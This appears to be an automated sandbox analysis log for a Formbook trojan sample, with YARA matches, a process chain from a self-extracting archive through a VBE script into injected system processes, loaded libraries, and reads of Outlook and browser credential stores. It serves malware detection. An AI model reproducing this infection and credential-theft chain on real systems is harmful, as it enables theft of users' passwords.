            Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/54@6/4
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E6932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_00E6932C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC194F AdjustTokenPrivileges,CloseHandle,8_2_00DC194F
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_00DC1F53
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_00DD5B27
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_00DCDC9C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DE4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,8_2_00DE4089
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00E7EBD3
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmFile created: C:\Users\user\AppData\Roaming\uhexJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2580:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5932
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCommand line argument: 0T0_2_00E8454A
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCommand line argument: sfxname0_2_00E8454A
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCommand line argument: sfxstime0_2_00E8454A
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCommand line argument: STARTDLG0_2_00E8454A
            Source: FS04dlvJrq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: EhStorAuthn.exe, 00000016.00000003.2885617630.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3355997152.00000000028E1000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3355997152.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: FS04dlvJrq.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile read: C:\Users\user\Desktop\FS04dlvJrq.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\FS04dlvJrq.exe "C:\Users\user\Desktop\FS04dlvJrq.exe"
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm bpqdpksed.icm vbepwhj.mp3
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm bpqdpksed.icm vbepwhj.mp3Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: FS04dlvJrq.exeStatic file information: File size 1336477 > 1048576
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: FS04dlvJrq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: FS04dlvJrq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FS04dlvJrq.exe
            Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmfPfCOHcNt.exe, 00000015.00000002.3356947382.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725761055.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
